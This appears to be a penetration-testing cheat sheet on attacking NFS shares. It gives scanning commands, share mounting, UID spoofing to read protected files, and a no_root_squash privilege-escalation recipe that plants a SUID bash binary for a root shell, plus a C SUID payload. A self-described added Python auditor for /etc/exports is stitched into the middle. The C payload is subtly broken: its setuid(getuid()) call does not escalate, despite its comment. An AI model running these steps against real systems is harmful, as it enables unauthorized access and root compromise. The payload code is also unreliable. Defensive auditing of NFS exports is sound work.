NFS
NFS usually uses ports 111, 2049
What is NFS?
NFS (Network File System) is a stable and widely used protocol for sharing storage between UNIX/Linux systems. With NFS the same files can be accessed from multiple computers, which simplifies storage management: instead of installing an application on every local disk, a single shared copy can be used.
PORT STATE SERVICE VERSION
2049/tcp open nfs
NFS Pentesting
Shodan search query: port:2049
Misconfigured NFS
Misconfigured file shares yield a lot of data in most companies that undergo a network penetration test.
NFS Service Detection in Network with Nmap
nmap -n -PN -sS -T5 -p 2049 --script=nfs-showmount 10.10.x.x/24
nmap --script=nfs-ls.nse,nfs-showmount.nse,nfs-statfs.nse -p 2049 10.10.x.x
Network NFS Service Detection with Metasploit
msf > use auxiliary/scanner/nfs/nfsmount
msf auxiliary(nfsmount) > set RHOSTS 10.10.x.x/24
msf auxiliary(nfsmount) > run
NFS Shares Listing With “showmount”
showmount -e 10.10.x.x
Access to discovered NFS shares
mount -t nfs 10.10.x.x:/export/home /mnt/connect_path
mount -t nfs -o vers=2,nolock 10.10.x.x:/export/home /mnt/connect_path # Ask for version 2: it has no authentication or authorization beyond the UID/GID the client itself asserts (AUTH_SYS).
Access to discovered NFS shares with same user UID Permissions
Listing the mounted share shows the files together with the numeric UID and GID of the user that owns them.
-rwxr----- 1923 1000 1898 example.doc
We see that there is a document, but to open it we may need a user whose UID matches the UID that is authorized on the share. First, unmount the share we mounted, using the umount command. Then create a user with the same UID value on the local system.
umount /mnt/connect_path
Yes, we have unmounted. Now let’s create a user with the same UID value.
useradd newuser
Setting the user's UID value:
usermod -u 1923 newuser
Mount the share on the local system again after setting the UID value:
mount -t nfs 192.168.x.x:/export/home /home/newuser/Desktop/connect_path
NFS no_root_squash/no_all_squash misconfiguration PE
Read the /etc/exports file. If you find a directory configured with no_root_squash, you can mount it as a client and write inside that directory as if you were the local root of the machine.
no_root_squash: this option gives the root user on the client the authority to access files on the NFS server as root, which can have serious security implications.
no_all_squash: similar to no_root_squash, but it applies to non-root users. Imagine you have a shell as the nobody user: check the /etc/exports file; the no_all_squash option is present; check the /etc/passwd file; emulate a non-root user; create a SUID file as that user (by mounting over NFS); execute the SUID file as the nobody user and become that different user.
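The UID-matching section above and the squash options described here come down to one server-side rule: with AUTH_SYS the server believes whatever UID/GID the client sends, applies the export's squash options to that identity, and then checks ordinary mode bits. The following Python is an added example, not code from the original page: it parses a constructed /etc/exports, flags the clauses a defender should care about (no_root_squash, world exports, rw without all_squash, and the space-before-parenthesis mistake that exports(5) warns about), and models the UID mapping plus the mode-bit check for the example.doc listing shown earlier (-rwxr----- owned by 1923:1000). The sample exports content, the hosts in it and the 65534 default anonuid are assumptions.

```python
import re

NOBODY_UID = 65534  # conventional anonuid; an explicit anonuid= in the export overrides it

# Constructed sample exports file (not taken from any real host)
SAMPLE_EXPORTS = """\
# /etc/exports - constructed sample
/export/home   10.10.0.0/24(rw,sync,no_root_squash)
/srv/public    *(ro,sync,root_squash)
/srv/data      10.10.0.5(rw,sync,all_squash,anonuid=1000,anongid=1000) 10.10.0.6(rw,no_all_squash)
/srv/backup    10.10.0.7 (rw)
"""


def parse_options(text):
    """'rw,sync,anonuid=1000' -> {'rw': True, 'sync': True, 'anonuid': '1000'}"""
    opts = {}
    for item in filter(None, text.split(',')):
        key, _, value = item.partition('=')
        opts[key.strip()] = value.strip() if value else True
    return opts


def parse_exports(text):
    """Return [(path, client, options)] for every client clause in an exports file.

    A bare client with no '(...)' gets {} and exportfs applies its defaults
    (notably root_squash). A clause that starts with '(' means there was a
    space after the host; exports(5) documents that as applying the options
    to *every* host, so it is recorded as client '*' with marker '_space_bug'.
    """
    entries = []
    for raw in text.splitlines():
        line = raw.split('#', 1)[0].strip()
        if not line:
            continue
        parts = line.split(None, 1)
        path, rest = parts[0], (parts[1] if len(parts) > 1 else '')
        for token in rest.split():
            if token.startswith('('):
                opts = parse_options(token[1:-1])
                opts['_space_bug'] = True
                entries.append((path, '*', opts))
            elif '(' in token and token.endswith(')'):
                client, _, opts_text = token[:-1].partition('(')
                entries.append((path, client, parse_options(opts_text)))
            else:
                entries.append((path, token, {}))
    return entries


def map_uid(asserted_uid, opts):
    """UID the server acts with, given the UID the client asserted under AUTH_SYS.

    Mirrors the exports(5) squash rules: all_squash maps everyone to anonuid,
    root_squash (the default) maps only UID 0, no_root_squash keeps UID 0 as 0.
    """
    anonuid = int(opts.get('anonuid', NOBODY_UID))
    if opts.get('all_squash'):
        return anonuid
    if asserted_uid == 0 and not opts.get('no_root_squash'):
        return anonuid
    return asserted_uid


def can_access(uid, gids, owner_uid, owner_gid, mode, want):
    """POSIX mode-bit check the server applies after UID mapping.

    mode is the numeric permission (0o740 for -rwxr-----); want is 'r', 'w' or 'x'.
    UID 0 bypasses read/write checks and needs only some execute bit for 'x'.
    """
    bit = {'r': 4, 'w': 2, 'x': 1}[want]
    if uid == 0:
        return want != 'x' or bool(mode & 0o111)
    if uid == owner_uid:
        shift = 6
    elif owner_gid in gids:
        shift = 3
    else:
        shift = 0
    return bool((mode >> shift) & bit)


def audit(entries):
    """Findings a defender would want to see from an exports file."""
    findings = []
    for path, client, opts in entries:
        shown = sorted(k for k in opts if not k.startswith('_'))
        if opts.get('_space_bug'):
            findings.append(f"{path}: space before '(' exports it to every host with {shown}")
        elif client == '*':
            findings.append(f"{path}: exported to every host")
        if opts.get('no_root_squash'):
            findings.append(f"{path} -> {client}: no_root_squash, client root is server root")
        if opts.get('rw') and not opts.get('all_squash'):
            findings.append(f"{path} -> {client}: rw without all_squash, writes trust the client-asserted UID")
    return findings


def demo():
    """Tie the pieces to the page: example.doc is -rwxr----- owned by 1923:1000."""
    entries = parse_exports(SAMPLE_EXPORTS)
    by_path = {}
    for path, _client, opts in entries:
        by_path.setdefault(path, opts)  # first clause per path is enough here
    return {
        'uid_1923_reads_doc': can_access(1923, {1923}, 1923, 1000, 0o740, 'r'),
        'uid_1000_reads_doc': can_access(1000, {1000}, 1923, 1000, 0o740, 'r'),
        'uid_5555_reads_doc': can_access(5555, {5555}, 1923, 1000, 0o740, 'r'),
        'root_on_export_home': map_uid(0, by_path['/export/home']),
        'root_on_srv_public': map_uid(0, by_path['/srv/public']),
        'findings': audit(entries),
    }


if __name__ == '__main__':
    for key, value in demo().items():
        print(key, value)
```

The demo shows why creating a local user with UID 1923 is enough to read example.doc (the server never checks who the client really is), why a client with UID 1000 also gets read access through the group bits, and how the same asserted UID 0 becomes 0 on the no_root_squash export but 65534 on the squashed one. Running the auditor against a real /etc/exports is a quick way to find the exports this page's privilege-escalation section relies on before someone else does.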
Privilege Escalation
Remote Exploit
If you have found this vulnerability, you can exploit it by mounting that directory on a client machine, copying the /bin/bash binary into the mounted folder as root, giving it SUID rights, and executing that bash binary from the victim machine.
#Attacker, as root user
mkdir /tmp/pe
mount -t nfs <IP>:<SHARED_FOLDER> /tmp/pe
cd /tmp/pe
cp /bin/bash .
chmod +s bash
#Victim
cd <SHARED_FOLDER>
./bash -p #ROOT shell
Alternatively, mount that directory on a client machine, copy your own compiled payload that abuses the SUID permission into the mounted folder as root, give it SUID rights, and execute that binary from the victim machine (you can find here some C SUID payloads).
//gcc payload.c -o payload
#include <stdio.h>
#include <stdlib.h>     /* system() */
#include <unistd.h>
#include <sys/types.h>
int main(){
    setuid(getuid());   /* set the effective UID to the caller's real UID */
    system("/bin/bash"); /* spawn a shell */
    return 0;
}